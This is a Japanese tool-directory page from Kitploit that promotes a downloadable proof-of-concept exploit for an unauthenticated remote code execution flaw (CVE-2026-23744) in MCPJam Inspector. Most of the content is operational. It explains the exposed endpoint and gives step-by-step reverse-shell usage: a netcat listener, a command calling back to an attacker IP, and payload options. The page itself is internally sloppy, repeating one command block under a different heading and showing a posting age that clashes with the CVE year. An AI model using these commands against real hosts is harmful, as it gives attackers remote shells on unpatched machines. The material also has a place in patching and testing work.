Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — MCPJam Inspector <= 1.4.2 における未認証のリモートコード実行(RCE)脆弱性の概念実証(PoC)エクスプロイト。 | Kitploit
ツール/GitHubGitHub/sbouabid-sec/cve-2026-23744-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubsbouabid-sec/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — MCPJam Inspector <= 1.4.2 における未認証のリモートコード実行(RCE)脆弱性の概念実証(PoC)エクスプロイト。

リポジトリを見る
23ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744 — MCPJam Inspector の未認証 RCE

Python CVE Platform

MCPJam Inspector <= 1.4.2 はデフォルトで 0.0.0.0 にバインドし、認証なしで /api/mcp/connect を公開します。このエンドポイントは serverConfig オブジェクトを受け入れ、ホスト上で直接プロセスを起動します — リバースシェルのペイロードを渡すと、認証情報なしで即座に RCE が成立します。


必要条件

root@kitploit:~
pip install requests

使用方法

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]

リバースシェルの例

ステップ 1 — リスナーを起動:

root@kitploit:~
nc -lvnp 4444

ステップ 2 — エクスプロイトを実行:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

ペイロード方式

ターゲット上で busybox が動作しない場合は、他の方式を試してください:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

影響を受けるバージョン

ソフトウェア脆弱なバージョン修正済みバージョン
MCPJam Inspector<= 1.4.21.4.3

参照

  • CrowdSec CVE トラッカー — CVE-2026-23744
  • MCPJam Inspector GitHub
ツールをダウンロード
フラグ説明デフォルト
-uターゲット URL必須
-iリスナー IP(LHOST)必須
-pリスナーポート(LPORT)必須
-mペイロード方式: busybox、bash、python3busybox